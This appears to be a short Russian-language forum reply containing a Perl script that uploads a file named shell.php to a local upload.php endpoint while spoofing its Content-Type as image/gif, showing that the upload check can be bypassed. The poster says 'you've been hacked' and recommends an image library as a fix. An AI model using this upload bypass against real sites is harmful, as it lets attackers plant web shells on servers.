{% else-1 %}
(22 янв 2017, 09:50) (0/0) [0]
[code]
#!/usr/bin/perl
#
use LWP;
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;;
$res = $ua->request(POST 'http://localhost/upload.php',
Content_Type => 'form-data',
Content => [userfile => ["shell.php", "shell.php", "Content-Type" =>"image/gif"],],);
print $res->as_string();
[/code]

Ты взломан. Советую использовать библиотеку Simple Image. Она также используется в Joomla
  • 1 из 1